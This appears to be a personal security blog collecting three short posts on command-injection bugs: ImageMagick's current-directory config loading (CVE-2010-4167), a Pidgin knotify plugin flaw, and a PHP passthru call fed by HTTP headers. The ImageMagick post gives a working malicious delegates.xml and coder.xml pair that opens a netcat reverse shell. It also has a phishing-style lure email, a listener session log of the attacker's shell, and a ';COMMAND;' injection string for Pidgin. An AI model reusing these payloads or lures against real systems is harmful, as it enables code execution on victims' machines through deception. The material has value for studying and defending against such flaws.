Funny ImageMagic CMD Injection

Sometimes i don't read vendors vulnerability reports, because they are so boring and don't give technical information about vulnerability. Last day, i read Ubuntu Security Notice's vulnerability report and it seemed interesting. Firstly, i read description section, it says;
"It was discovered that ImageMagick would search for configuration files in
the current directory. If a user were tricked into opening or processing an
image in an arbitrary directory, a local attacker could execute arbitrary
code with the user's privileges." [1]

After that i search for CVE ID of vulnerability "CVE-2010-4167". If i don't find anything i will be review diff files. But debian bug tracking pages help me. [2]
I always belive that, bug tracking systems always very usefull for finding security bugs/developing exploits.

The opened issue was true, when you create config files and run imagemagic, imagemagic looks current directory for config files, so if you can able to create malicious config file or your target run "convert" binary with your malicious config file, you can execute commands with current user privileges.

We create malicious xml config files, they are execute commands on currents users context. In example, i execute netcat for getting a reverse shell -) I send mail them to my victim;
"Hello dear, i need to convert my png file to jpg and i can't access my computer now, can you do it for me? I attached the png file.."

If my victim open it (for this case he will open :P ) my arbitrary codes will be executed on system.

Victim:
[victim@vmware:~/img]$ unzip please_convert.zip
... snipped ...
[victim@vmware:~/img]$ convert x.png a.jpg
convert: unable to open image `/tmp/magick-XXFJtZIk': No such file or directory @ blob.c/OpenBlob/2480.
convert: unable to open file `/tmp/magick-XXFJtZIk': No such file or directory @ constitute.c/ReadImage/569.
convert: missing an image filename `a.jpg' @ convert.c/ConvertImageCommand/2838.

Attacker:

[cb@lab:~/imagemagic-Xploi7]$ nc.traditional -lvvp 1337

listening on [any] 1337 ...

connect to [127.0.0.1] from localhost [127.0.0.1] 37267

ls

coder.xml

delegates.xml

sshoos

xploit.txt

x.png

echo "owned :P"

owned :P

exit

 sent 24, rcvd 57

Here is the example delegate.xml file:

<delegatemap>
<delegate decode='png' command="nc.traditional -e /bin/sh 127.0.0.1 1337"/>
</delegatemap>

and here is the example coder.xml file:

<codermap>
<coder magick='png' name='notpng'/>
</codermap>

Note: delegate.xml file needs coder.xml for executing by imagemagic.

References:
[1] - http://www.ubuntu.com/usn/usn-1028-1
[2] - http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=601824

Funny Command Injection in Pidgin

Today @_ikki tweet about this funny "fail" bug.Pidgins knotify plugin have remote command injection vulnerability. When you type some commands to your victim its executed with current users local priveliges. Its funny!! :>

--[src/pidgin-knotify.c:71-74]--
command = g_strdup_printf("kdialog --title '%s' --passivepopup '%s' %d", title,
body, timeout);
[...]
result = system(command);
--snip--


Exploitation:
Type your friend who use knotifies old version --> ';COMMAND;'

Reference:
https://bugs.gentoo.org/show_bug.cgi?id=336916

[Analiz] Yet Another Remote Command Execution

Yine bir Remote Command Execution analizi ile karşındayım blog :) Code Injection yada RCE olarak sınıflandırabilirim sanırım bu zafiyeti. Herneyse kaynak kodu incelemeye başlayayım.


xxxxxxxxxxxx.php
...
$command = 'HTTP_COOKIE="'.getStringFromServer('HTTP_COOKIE').'" '.
'REMOTE_ADDR="'.getStringFromServer('REMOTE_ADDR').'" '.
'QUERY_STRING="'.$query_string.'" '.
'SERVER_SOFTWARE="'.getStringFromServer('SERVER_SOFTWARE').'" '.
'SCRIPT_NAME="'.getStringFromServer('SCRIPT_NAME').'" '.
'HTTP_USER_AGENT="'.getStringFromServer('HTTP_USER_AGENT').'" '.
'HTTP_ACCEPT_ENCODING="'.getStringFromServer('HTTP_ACCEPT_ENCODING').'" '.
'HTTP_ACCEPT_LANGUAGE="'.getStringFromServer('HTTP_ACCEPT_LANGUAGE').'" '.
'PATH_INFO="'.$path.'" '.
'PATH="'.getStringFromServer('PATH').'" '.
'HTTP_HOST="'.getStringFromServer('HTTP_HOST').'" '.
'DOCUMENT_ROOT="'.getStringFromServer('DOCUMENT_ROOT').'" '.
...
passthru($command);
...


getStringFromServer fonksiyonunda herhangi gibi bir filtreleme vs.. yok. Daha da konuşmaya gerek yok zaten :) HTTP başlıklarıyla (örn: Cookie, User-Agent, Accept-Encoding, Accept-Language) hedef üzerinde komut çalıştırabilirsiniz. Exploit? 1-2 güne bir reverse shell hortlatan bir remote exploit yazar yayınlarım herhalde. Az da olsa deneyimlerimden yola çıkarak belirtiyorum ki, web uygulamalarını ve zafiyetlerini hafife almamak gerekir.

cb